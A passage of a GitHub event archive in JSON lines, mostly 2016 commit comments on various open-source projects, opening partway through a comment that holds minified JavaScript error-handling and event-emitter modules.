m=k+c('ex')._prefix.length,n=l+c('ex')._suffix.length;if(m>=l)return ['erx slice failure: %s',j];var o=j.substring(0,k),p=j.substring(n);j=j.substring(m,l);var q;try{q=JSON.parse(j);q[0]=o+q[0]+p;}catch(r){return ['erx parse failure: %s',j];}return q;};f.exports=h;}),null);\r\n__d(\"removeFromArray\",[],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();function h(i,j){var k=i.indexOf(j);if(k!==-1)i.splice(k,1);}f.exports=h;}),null);\r\n__d('ErrorUtils',['Env','eprintf','erx','removeFromArray'],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();var h='<anonymous guard>',i='<generated guard>',j=typeof window==='undefined'?'<self.onerror>':'<window.onerror>',k=/^https?:\\/\\//i,l=/^Type Mismatch for/,m=['Unknown script code','Function code','eval code'],n=new RegExp('(.*?)\\\\s(?:'+m.join('|')+')$'),o=/(.*)[@\\s][^\\s]+$/,p=[],q=void 0,r=[],s=50,t=[],u=false,v=false,w=location.search.indexOf('nocatch')!==-1;function x(ba){if(!ba)return [];return ba.split(/\\n\\n/)[0].replace(/[\\(\\)]|\\[.*?\\]|^\\w+:\\s.*?\\n/g,'').split('\\n').map(function(ca){ca=ca.trim();var da=void 0,ea=void 0,fa=ca.match(/:(\\d+)(?::(\\d+))?$/);if(fa){da=fa[1];ea=fa[2];ca=ca.slice(0,-fa[0].length);}var ga=void 0,ha=ca.match(n)||ca.match(o);if(ha){ca=ca.substring(ha[1].length+1);var ia=ha[1].match(/(?:at)?\\s*(.*)(?:[^\\s]+|$)/);ga=ia?ia[1]:'';}var ja={column:ea,identifier:ga,line:da,script:ca};if(q)q(ja);ja.text='    at'+(ja.identifier?' '+ja.identifier+' (':' ')+ja.script+(ja.line?':'+ja.line:'')+(ja.column?':'+ja.column:'')+(ja.identifier?')':'');return ja;});}function y(ba){t.unshift(ba);u=true;}function z(){t.shift();u=t.length!==0;}var aa={ANONYMOUS_GUARD_TAG:h,GENERATED_GUARD_TAG:i,GLOBAL_ERROR_HANDLER_TAG:j,history:r,addListener:function ba(ca,da){p.push(ca);if(!da)r.forEach(ca);},removeListener:function ba(ca){c('removeFromArray')(p,ca);},setSourceResolver:function ba(ca){q=ca;},applyWithGuard:function ba(ca,da,ea,fa,ga){y(ga||h);if(c('Env').nocatch)w=true;if(w){var ha=void 0;try{ha=ca.apply(da,ea||[]);}finally{z();}return ha;}try{return ca.apply(da,ea||[]);}catch(ia){var ja=aa.normalizeError(ia);if(fa)fa(ja);if(ca)ja.callee=ca.toString().substring(0,100);if(ea)ja.args=Array.from(ea).toString().substring(0,100);ja.guard=t[0];ja.guardList=t.slice();aa.reportError(ja);}finally{z();}},guard:function ba(ca,da,ea){da=da||ca.name||i;function fa(){return aa.applyWithGuard(ca,ea||this,arguments,null,da);}if(ca.__SMmeta)fa.__SMmeta=ca.__SMmeta;return fa;},inGuard:function ba(){return u;},normalizeError:function ba(ca){if(!ca){return {};}else if(ca._originalError)return ca;var da=x(ca.stackTrace||ca.stack),ea=false;if(ca.framesToPop){var fa=ca.framesToPop,ga=void 0;while(fa>0&&da.length>0){ga=da.shift();fa--;ea=true;}if(l.test(ca.message)&&ca.framesToPop===2&&ga)if(k.test(ga.script))ca.message+=' at '+ga.script+(ga.line?':'+ga.line:'')+(ga.column?':'+ga.column:'');delete ca.framesToPop;}var ha={line:ca.lineNumber||ca.line,column:ca.columnNumber||ca.column,name:ca.name,message:ca.message,messageWithParams:ca.messageWithParams,type:ca.type,script:ca.fileName||ca.sourceURL||ca.script,stack:da.map(function(ja){return ja.text;}).join('\\n'),stackFrames:da,guard:ca.guard,guardList:ca.guardList,extra:ca.extra,snapshot:ca.snapshot};if(typeof ha.message==='string'&&!ha.messageWithParams){ha.messageWithParams=c('erx')(ha.message);ha.message=c('eprintf').apply(b,ha.messageWithParams);}else{ha.messageObject=ha.message;ha.message=String(ha.message);}if(q)q(ha);if(ea){delete ha.script;delete ha.line;delete ha.column;}if(da[0]){ha.script=ha.script||da[0].script;ha.line=ha.line||da[0].line;ha.column=ha.column||da[0].column;}ha._originalError=ca;for(var ia in ha)if(ha[ia]==null)delete ha[ia];return ha;},onerror:function ba(ca,da,ea,fa,ga){ga=ga||{};ga.message=ga.message||ca;ga.script=ga.script||da;ga.line=ga.line||ea;ga.column=ga.column||fa;ga.guard=j;ga.guardList=[j];aa.reportError(ga,true);},reportError:function ba(ca,da){if(v)return false;if(t.length>0){ca.guard=ca.guard||t[0];ca.guardList=t.slice();}ca=aa.normalizeError(ca);!da;if(r.length>s)r.splice(s/2,1);r.push(ca);v=true;for(var ea=0;ea<p.length;ea++)try{p[ea](ca);}catch(fa){}v=false;return true;}};b.onerror=aa.onerror;f.exports=b.ErrorUtils=aa;if(typeof __t==='function'&&__t.setHandler)__t.setHandler(aa.reportError);}),3);\r\n__d('CallbackDependencyManager',['ErrorUtils'],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();function h(){'use strict';this.$CallbackDependencyManager1={};this.$CallbackDependencyManager2={};this.$CallbackDependencyManager3=1;this.$CallbackDependencyManager4={};}h.prototype.$CallbackDependencyManager5=function(i,j){'use strict';var k=0,l={};for(var m=0,n=j.length;m<n;m++)l[j[m]]=1;for(var o in l){if(this.$CallbackDependencyManager4[o])continue;k++;if(this.$CallbackDependencyManager1[o]===undefined)this.$CallbackDependencyManager1[o]={};this.$CallbackDependencyManager1[o][i]=(this.$CallbackDependencyManager1[o][i]||0)+1;}return k;};h.prototype.$CallbackDependencyManager6=function(i){'use strict';if(!this.$CallbackDependencyManager1[i])return;for(var j in this.$CallbackDependencyManager1[i]){this.$CallbackDependencyManager1[i][j]--;if(this.$CallbackDependencyManager1[i][j]<=0)delete this.$CallbackDependencyManager1[i][j];this.$CallbackDependencyManager2[j].$CallbackDependencyManager7--;if(this.$CallbackDependencyManager2[j].$CallbackDependencyManager7<=0){var k=this.$CallbackDependencyManager2[j].$CallbackDependencyManager8;delete this.$CallbackDependencyManager2[j];c('ErrorUtils').applyWithGuard(k);}}};h.prototype.addDependenciesToExistingCallback=function(i,j){'use strict';if(!this.$CallbackDependencyManager2[i])return null;var k=this.$CallbackDependencyManager5(i,j);this.$CallbackDependencyManager2[i].$CallbackDependencyManager7+=k;return i;};h.prototype.isPersistentDependencySatisfied=function(i){'use strict';return !!this.$CallbackDependencyManager4[i];};h.prototype.satisfyPersistentDependency=function(i){'use strict';this.$CallbackDependencyManager4[i]=1;this.$CallbackDependencyManager6(i);};h.prototype.satisfyNonPersistentDependency=function(i){'use strict';var j=this.$CallbackDependencyManager4[i]===1;if(!j)this.$CallbackDependencyManager4[i]=1;this.$CallbackDependencyManager6(i);if(!j)delete this.$CallbackDependencyManager4[i];};h.prototype.registerCallback=function(i,j){'use strict';var k=this.$CallbackDependencyManager3;this.$CallbackDependencyManager3++;var l=this.$CallbackDependencyManager5(k,j);if(l===0){c('ErrorUtils').applyWithGuard(i);return null;}this.$CallbackDependencyManager2[k]={$CallbackDependencyManager8:i,$CallbackDependencyManager7:l};return k;};h.prototype.unsatisfyPersistentDependency=function(i){'use strict';delete this.$CallbackDependencyManager4[i];};f.exports=h;}),null);\r\n__d('EventSubscription',[],(function a(b,c,d,e,f,g){'use strict';if(c.__markCompiled)c.__markCompiled();function h(i){this.subscriber=i;}h.prototype.remove=function(){if(this.subscriber){this.subscriber.removeSubscription(this);this.subscriber=null;}};f.exports=h;}),null);\r\n__d('EmitterSubscription',['EventSubscription'],(function a(b,c,d,e,f,g){'use strict';var h,i;if(c.__markCompiled)c.__markCompiled();h=babelHelpers.inherits(j,c('EventSubscription'));i=h&&h.prototype;function j(k,l,m){i.constructor.call(this,k);this.listener=l;this.context=m;}f.exports=j;}),null);\r\n__d(\"sprintf\",[],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();function h(i){for(var j=arguments.length,k=Array(j>1?j-1:0),l=1;l<j;l++)k[l-1]=arguments[l];var m=0;return i.replace(/%s/g,function(n){return k[m++];});}f.exports=h;}),null);\r\n__d('invariant',['ex','sprintf'],(function a(b,c,d,e,f,g){'use strict';if(c.__markCompiled)c.__markCompiled();var h=c('ex');function i(j,k){if(!j){var l=void 0;if(k===undefined){l=new Error('Minified exception occurred; use the non-minified dev environment '+'for the full error message and additional helpful warnings.');}else{var m=[k];for(var n=2,o=arguments.length;n<o;n++)m.push(arguments[n]);l=new Error(h.apply(null,m));l.name='Invariant Violation';l.messageWithParams=m;}l.framesToPop=1;throw l;}}f.exports=i;}),null);\r\n__d('EventSubscriptionVendor',['invariant'],(function a(b,c,d,e,f,g,h){'use strict';if(c.__markCompiled)c.__markCompiled();function i(){this.$EventSubscriptionVendor1={};}i.prototype.addSubscription=function(j,k){!(k.subscriber===this)?h(0):void 0;if(!this.$EventSubscriptionVendor1[j])this.$EventSubscriptionVendor1[j]=[];var l=this.$EventSubscriptionVendor1[j].length;this.$EventSubscriptionVendor1[j].push(k);k.eventType=j;k.key=l;return k;};i.prototype.removeAllSubscriptions=function(j){if(j===undefined){this.$EventSubscriptionVendor1={};}else delete this.$EventSubscriptionVendor1[j];};i.prototype.removeSubscription=function(j){var k=j.eventType,l=j.key,m=this.$EventSubscriptionVendor1[k];if(m)delete m[l];};i.prototype.getSubscriptionsForType=function(j){return this.$EventSubscriptionVendor1[j];};f.exports=i;}),null);\r\n__d(\"emptyFunction\",[],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();function h(j){return function(){return j;};}var i=function j(){};i.thatReturns=h;i.thatReturnsFalse=h(false);i.thatReturnsTrue=h(true);i.thatReturnsNull=h(null);i.thatReturnsThis=function(){return this;};i.thatReturnsArgument=function(j){return j;};f.exports=i;}),null);\r\n__d('BaseEventEmitter',['invariant','EmitterSubscription','ErrorUtils','EventSubscriptionVendor','emptyFunction'],(function a(b,c,d,e,f,g,h){if(c.__markCompiled)c."}},"created_at":"2016-09-02T11:14:04Z"}
{"id":"4507948486","type":"CommitCommentEvent","actor":{"login":"Bjwebb"},"repo":{"name":"OpenDataServices/grantnav"},"payload":{"comment":{"id":18878642,"position":null,"line":null,"path":null,"commit_id":"3d5f20652aed798e134a9e2f51b62557e46222b7","created_at":"2016-09-02T11:15:20Z","updated_at":"2016-09-02T11:15:20Z","body":"This also fixes the remaining task in https://github.com/OpenDataServices/grantnav/issues/171"}},"created_at":"2016-09-02T11:15:20Z"}
{"id":"4507952715","type":"CommitCommentEvent","actor":{"login":"daddy995"},"repo":{"name":"BrightcoveOS/videojs-ga-videocloud"},"payload":{"comment":{"id":18878648,"position":65,"line":62,"path":"dist/videojs.ga.videocloud.js","commit_id":"0e6d05cc2be5307bc4b033a5abc8c01d1c132361","created_at":"2016-09-02T11:16:31Z","updated_at":"2016-09-02T11:16:31Z","body":"indow.location.host === 'players.brightcove.net' || window.location.host === 'preview-players.brightcove.net') {"}},"created_at":"2016-09-02T11:16:31Z"}
{"id":"4507954093","type":"CommitCommentEvent","actor":{"login":"Fr3ddy7"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18878652,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T11:16:53Z","updated_at":"2016-09-02T11:16:53Z","body":":D yes, work good\r\nnot think of the right mouse click in the tree"}},"created_at":"2016-09-02T11:16:53Z"}
{"id":"4507954340","type":"CommitCommentEvent","actor":{"login":"paplorinc"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18878653,"position":138,"line":224,"path":"javaslang/src/main/java/javaslang/collection/Map.java","commit_id":"d805e420f97a6255457f1d483fd9af66dfacbac7","created_at":"2016-09-02T11:16:56Z","updated_at":"2016-09-02T11:16:56Z","body":"We should at least check against the latest Eclipse, hoping they've fixed it :/"}},"created_at":"2016-09-02T11:16:56Z"}
{"id":"4507956104","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBook"},"payload":{"comment":{"id":18878660,"position":31,"line":107,"path":"src/Pack/Address.java","commit_id":"e3b7c7e1757586edb4b0bb3e2299f5cd9c8afba0","created_at":"2016-09-02T11:17:28Z","updated_at":"2016-09-02T11:17:28Z","body":"here you should have repo layer method call for keep that data to database (in your file)"}},"created_at":"2016-09-02T11:17:28Z"}
{"id":"4507967338","type":"CommitCommentEvent","actor":{"login":"slackner"},"repo":{"name":"alexhenrie/wine"},"payload":{"comment":{"id":18878678,"position":4,"line":167,"path":"dlls/shell32/shell32_main.h","commit_id":"cd522341acb52d3c6a6aba791acb6f6cbd2a394f","created_at":"2016-09-02T11:20:28Z","updated_at":"2016-09-02T11:20:28Z","body":"There is still a LPWSTR type here."}},"created_at":"2016-09-02T11:20:28Z"}
{"id":"4507967556","type":"CommitCommentEvent","actor":{"login":"NejcZdovc"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":18878679,"position":32,"line":26,"path":"src/store/storage/local.ts","commit_id":"028091d444e36faf46ec75c7415552da0a203691","created_at":"2016-09-02T11:20:31Z","updated_at":"2016-09-02T11:20:31Z","body":"I am using it\r\n\r\n![image](https://cloud.githubusercontent.com/assets/9574457/18202401/02980ee8-7110-11e6-886c-e0836facc00a.png)\r\n\r\n\r\n"}},"created_at":"2016-09-02T11:20:31Z"}
{"id":"4507967615","type":"CommitCommentEvent","actor":{"login":"pbrest"},"repo":{"name":"rstudio/Intro"},"payload":{"comment":{"id":18878680,"position":null,"line":null,"path":null,"commit_id":"23fac218ec796e440fac5e8fada230989b10ed32","created_at":"2016-09-02T11:20:32Z","updated_at":"2016-09-02T11:20:32Z","body":"Hi Garret\r\nI ve got some problems to download the example datasets.\r\nIs it possible to get them by an alternative way?\r\nthanks\r\nPatrick"}},"created_at":"2016-09-02T11:20:32Z"}
{"id":"4507969975","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878683,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T11:21:13Z","updated_at":"2016-09-02T11:21:13Z","body":"Nuke uses:\r\nOSX: ```/Library/Application Support/NUKE/x.x/plugins```\r\nWIN:  ```C:\\Program Files\\Common Files\\NUKE\\x.x\\plugins```"}},"created_at":"2016-09-02T11:21:13Z"}
{"id":"4507978595","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/Address-Book"},"payload":{"comment":{"id":18878702,"position":14,"line":12,"path":"src/am/aca/address_book/UserSession.java","commit_id":"126158583ca8053d9cf6740701b168f1ed7408e7","created_at":"2016-09-02T11:23:31Z","updated_at":"2016-09-02T11:23:31Z","body":"Here also will be good use single tone  pathern like\r\n\r\nprivate static UserRepository userRepository = UserRepository.getInstence();"}},"created_at":"2016-09-02T11:23:31Z"}
{"id":"4507982365","type":"CommitCommentEvent","actor":{"login":"Deesen"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18878710,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T11:24:33Z","updated_at":"2016-09-02T11:24:33Z","body":"I think it was the first notice added ;-) :\r\n\r\n![sortmenu2](https://cloud.githubusercontent.com/assets/8569221/18202488/7c5ceffa-7110-11e6-9ef7-56754984213c.png)\r\n"}},"created_at":"2016-09-02T11:24:33Z"}
{"id":"4507982885","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18878714,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T11:24:43Z","updated_at":"2016-09-02T11:24:43Z","body":"I like this!\r\nIf I'm not mistaken you could spare both operations and space by replacing\r\n```\r\n  int asymmetry;\r\n  int kqImbalance;\r\n```\r\nin the `Pawns` entry with just e.g.\r\n`  int initiative;`\r\nand possibly also compute `kingDistance` only when `do_king_safety()` is called."}},"created_at":"2016-09-02T11:24:43Z"}
{"id":"4507983123","type":"CommitCommentEvent","actor":{"login":"TheStatement"},"repo":{"name":"ZidCode/Ibsen_processor"},"payload":{"comment":{"id":18878715,"position":56,"line":56,"path":"ASD_Jeti_Ibsen_Intercal/Evaluation_Methods/Ibsen_level1_processor.py","commit_id":"7d50bba03dbfd9740afa95e4dc4a403999da8d09","created_at":"2016-09-02T11:24:47Z","updated_at":"2016-09-02T11:24:47Z","body":"Kann man machen, ich hab irgendwann mal ausprobiert wie viel Unterschied es\nmacht. Hab keinen sehen können, deswegen war es mir egal.\nAber ganz korrekt wäre sicherlich ddof = 1, ja.\n\n2016-09-02 13:08 GMT+02:00 ZidCode <notifications@github.com>:\n\n> Should we not use the sample standard deviation, Kerstin R program uses\n> this as default? ddof = 1\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ZidCode/Ibsen_processor/commit/7d50bba03dbfd9740afa95e4dc4a403999da8d09#commitcomment-18878582>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARkLMYQaCNhRHS9Bn6LiZZKa0m8kn9E6ks5qmAOygaJpZM4Jzmeg>\n> .\n>\n"}},"created_at":"2016-09-02T11:24:47Z"}
{"id":"4507984168","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18878720,"position":null,"line":null,"path":null,"commit_id":"069a1f202ccc1191ddc2ec8ea43c6293b719bd43","created_at":"2016-09-02T11:25:06Z","updated_at":"2016-09-02T11:25:06Z","body":"This commit is in preparation of being able to convert Humdrum instrument codes into MIDI instrument names or timbre numbers.   After issue #283 has been implemented, then this information can be passed on to the MEI data conversion.\r\n\r\nNote to me: there should be a feature in the Humdrum data for overriding the instrument code to General MIDI instrument number.\r\n\r\n"}},"created_at":"2016-09-02T11:25:06Z"}
{"id":"4507984410","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18878721,"position":null,"line":null,"path":null,"commit_id":"d658593c4632859276f4dcad53193af2af04e060","created_at":"2016-09-02T11:25:10Z","updated_at":"2016-09-02T11:25:10Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-122/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-02T11:25:10Z"}
{"id":"4507987210","type":"CommitCommentEvent","actor":{"login":"pmfx"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18878732,"position":null,"line":null,"path":null,"commit_id":"1ee53dfb9ddf30934893d1d122ee966afced683c","created_at":"2016-09-02T11:25:56Z","updated_at":"2016-09-02T11:25:56Z","body":"Hehe, cool!"}},"created_at":"2016-09-02T11:25:56Z"}
{"id":"4507991560","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18878753,"position":null,"line":null,"path":null,"commit_id":"823290bf290fcf5b8b063d6f75326a6864df16cd","created_at":"2016-09-02T11:27:14Z","updated_at":"2016-09-02T11:27:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#TbOZvedCTgmxrOeUqeVsag"}},"created_at":"2016-09-02T11:27:14Z"}
{"id":"4507993887","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18878774,"position":null,"line":null,"path":null,"commit_id":"4f77a1b5eb9d5c02483548fe28b2f16e2d25a780","created_at":"2016-09-02T11:27:51Z","updated_at":"2016-09-02T11:27:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Mlzmoa33SwaUmvLnB7wnYQ"}},"created_at":"2016-09-02T11:27:51Z"}
{"id":"4507994657","type":"CommitCommentEvent","actor":{"login":"deltaposter"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18878775,"position":19,"line":25,"path":"app/src/main/java/com/example/hanaj/k_tour/MainActivity.java","commit_id":"256b3590190187dc967ccc7364418f539713fe03","created_at":"2016-09-02T11:28:05Z","updated_at":"2016-09-02T11:28:05Z","body":"왜 NetworkTestListView 인지 ?"}},"created_at":"2016-09-02T11:28:05Z"}
{"id":"4507994716","type":"CommitCommentEvent","actor":{"login":"DanielFroehlich"},"repo":{"name":"wrichter/hailstorm"},"payload":{"comment":{"id":18878776,"position":null,"line":null,"path":null,"commit_id":"38c2099fbd742f1dff2ea8c67c1ec5e194237bb2","created_at":"2016-09-02T11:28:07Z","updated_at":"2016-09-02T11:28:07Z","body":"Sorry, das hätte ich Dir auch sagen sollen. Weil das bei mir zu Syntax\nFehlern geführt hat. Grüße Daniel\n\nDaniel Fröhlich\nSolution Architect Middleware\nOpenGroup Certified Master IT Architect\n\nMobile: +49 176 10 24 84 33\nPhone: +49 711 96 43 71 44\nE-Mail: daniel.froehlich@redhat.com\n\nRed Hat GmbH, http://www.de.redhat.com/, Registered seat: Grasbrunn,\nCommercial register: Amtsgericht Muenchen, HRB 153243,\nManaging Directors: Charles Cachera, Michael Cunningham, Michael O'Neill,\nEric Shander\n\nOn Fri, Sep 2, 2016 at 1:10 PM, Wolfram Richter <notifications@github.com>\nwrote:\n\n> LOL das hat bei mir Kopfzerbrechen bereitet.... warum hattest du das\n> eigentlich aaskommentiert? ansible/roles/layer2_infrastructure/tasks/\n> configure_named.yml\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wrichter/hailstorm/commit/38c2099fbd742f1dff2ea8c67c1ec5e194237bb2#commitcomment-18878607>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARrIW2PH3sMFWSZM7Y6EmBE1PpSwh-SAks5qmAQvgaJpZM4Jzmkf>\n> .\n>\n"}},"created_at":"2016-09-02T11:28:07Z"}
{"id":"4507997115","type":"CommitCommentEvent","actor":{"login":"HazelHik"},"repo":{"name":"HazelHik/hello-world"},"payload":{"comment":{"id":18878779,"position":3,"line":3,"path":"README.md","commit_id":"0ee99806956fc90d6e7371ec81fb5330ef55d9da","created_at":"2016-09-02T11:28:47Z","updated_at":"2016-09-02T11:28:47Z","body":"？？"}},"created_at":"2016-09-02T11:28:47Z"}
{"id":"4507997188","type":"CommitCommentEvent","actor":{"login":"deltaposter"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18878780,"position":5,"line":86,"path":"app/src/main/java/com/example/hanaj/k_tour/common/Network/Sample/NetworkTestListViewAdapter.java","commit_id":"256b3590190187dc967ccc7364418f539713fe03","created_at":"2016-09-02T11:28:48Z","updated_at":"2016-09-02T11:28:48Z","body":" NetworkTestListViewAdapter일 필요가 있을까."}},"created_at":"2016-09-02T11:28:48Z"}
{"id":"4507998038","type":"CommitCommentEvent","actor":{"login":"JoakimLarsson"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18878784,"position":null,"line":null,"path":null,"commit_id":"1d7ba6e45a20f485713a357e987f15c38c65124a","created_at":"2016-09-02T11:29:01Z","updated_at":"2016-09-02T11:29:01Z","body":"yeah, I save that for the next update, the symbol on the target system was what we call a sun-symbol ¤ and I couldn't find it. It was introduced by ABC80 in Sweden since we didn't want the '$' sign to represent currency and it spread locally to Esselte 100 and other computers at the same time."}},"created_at":"2016-09-02T11:29:01Z"}
{"id":"4507998909","type":"CommitCommentEvent","actor":{"login":"deltaposter"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18878786,"position":8,"line":8,"path":"app/src/main/res/layout/listview_item.xml","commit_id":"256b3590190187dc967ccc7364418f539713fe03","created_at":"2016-09-02T11:29:15Z","updated_at":"2016-09-02T11:29:15Z","body":"id들이 testImageView일 필요가 있는가."}},"created_at":"2016-09-02T11:29:15Z"}
{"id":"4508003901","type":"CommitCommentEvent","actor":{"login":"ShevT"},"repo":{"name":"m571-cm/android_device_meizu_m2note"},"payload":{"comment":{"id":18878799,"position":null,"line":null,"path":null,"commit_id":"60d84f5ddc8e56931c4705ccac1fb999888e4b2c","created_at":"2016-09-02T11:30:34Z","updated_at":"2016-09-02T11:30:34Z","body":"И зачем это выкинули? Чтобы руками скрипт пускать?"}},"created_at":"2016-09-02T11:30:34Z"}
{"id":"4508012834","type":"CommitCommentEvent","actor":{"login":"elvisciotti"},"repo":{"name":"ministryofjustice/opg-digi-deps-client"},"payload":{"comment":{"id":18878821,"position":null,"line":null,"path":null,"commit_id":"68fac7ffbf8c26513edce164a372f1d322881e78","created_at":"2016-09-02T11:33:02Z","updated_at":"2016-09-02T11:33:02Z","body":"@Biggsen this fixes another error at docker-build time. The reason - I guess - is a new sass version (it wasn't locked in the Dockerfile) now explicitly requires the needed partials. Could you please have look at the whole and re-order it ? not sure why the includes were in in two separate blocks "}},"created_at":"2016-09-02T11:33:02Z"}
{"id":"4508020716","type":"CommitCommentEvent","actor":{"login":"lucastobrazil"},"repo":{"name":"bgriffen/bgriffen.github.io"},"payload":{"comment":{"id":18878838,"position":null,"line":null,"path":null,"commit_id":"e5e1a399bc2e948541f9d0ee9bd59a518bc8f2aa","created_at":"2016-09-02T11:35:10Z","updated_at":"2016-09-02T11:35:10Z","body":"👯   :) "}},"created_at":"2016-09-02T11:35:10Z"}
{"id":"4508022895","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/Address-Book"},"payload":{"comment":{"id":18878847,"position":9,"line":9,"path":"src/am/aca/address_book/repository/Repository.java","commit_id":"126158583ca8053d9cf6740701b168f1ed7408e7","created_at":"2016-09-02T11:35:42Z","updated_at":"2016-09-02T11:35:42Z","body":"This Repo methods should also throws exceptions. \r\ne.g. I am trying add user with username which is already exists in our database or I'm trying to delete user but in our database this user doesn't exists and so on."}},"created_at":"2016-09-02T11:35:42Z"}
{"id":"4508025941","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18878855,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T11:36:29Z","updated_at":"2016-09-02T11:36:29Z","body":"@lucabrivio: I think it is not the first time someone propose something like that (calculating half of the initiative bonus in pawns.cpp, half in evaluate.cpp to speed things up), but this sounds a little bit like premature optimization to me as the initiative() bonus is still actively developed, and putting stuff in another file also has the drawback of freezing the implementation. Accessors to a class like Pawns should be for primitive, elementary features on top of which we develop the evaluation.\r\n\r\n"}},"created_at":"2016-09-02T11:36:29Z"}
{"id":"4508026566","type":"CommitCommentEvent","actor":{"login":"m-green"},"repo":{"name":"m-green/smart-answers"},"payload":{"comment":{"id":18878858,"position":null,"line":null,"path":null,"commit_id":"3d45691b5c53ad1af7771bb436366209e6d5bcfd","created_at":"2016-09-02T11:36:39Z","updated_at":"2016-09-02T11:36:39Z","body":"- Made clear that postgraduates need to fill in full form.\r\n- Fixed acronym explanations"}},"created_at":"2016-09-02T11:36:39Z"}
{"id":"4508030032","type":"CommitCommentEvent","actor":{"login":"davag"},"repo":{"name":"TemenosDS/DS-ESON"},"payload":{"comment":{"id":18878866,"position":21,"line":107,"path":"plugins/org.eclipse.emf.eson/src/org/eclipse/emf/eson/EFactoryRuntimeModule.java","commit_id":"c50cd9227fc53660c91bd6031321dc4f152d25a5","created_at":"2016-09-02T11:37:36Z","updated_at":"2016-09-02T11:37:36Z","body":"useless small change, but hopefully would be ok for MVO"}},"created_at":"2016-09-02T11:37:36Z"}
{"id":"4508033495","type":"CommitCommentEvent","actor":{"login":"m-green"},"repo":{"name":"m-green/smart-answers"},"payload":{"comment":{"id":18878871,"position":null,"line":null,"path":null,"commit_id":"fc5da4de6524c076da1fcb02848a04be662f7687","created_at":"2016-09-02T11:38:33Z","updated_at":"2016-09-02T11:38:33Z","body":"Fixed type in acronym explanation"}},"created_at":"2016-09-02T11:38:33Z"}
{"id":"4508035047","type":"CommitCommentEvent","actor":{"login":"m-green"},"repo":{"name":"m-green/smart-answers"},"payload":{"comment":{"id":18878874,"position":null,"line":null,"path":null,"commit_id":"8ef84bf951058c228936e19f7eb26dd368b2ea7d","created_at":"2016-09-02T11:38:59Z","updated_at":"2016-09-02T11:38:59Z","body":"Added title back in, further acronym fixes"}},"created_at":"2016-09-02T11:38:59Z"}
{"id":"4508035678","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18878876,"position":4,"line":55,"path":"authentication/admin.py","commit_id":"37a36382e365227262e96baab6e4e36b7d721a86","created_at":"2016-09-02T11:39:10Z","updated_at":"2016-09-02T11:39:10Z","body":"Охуенный коммит"}},"created_at":"2016-09-02T11:39:10Z"}
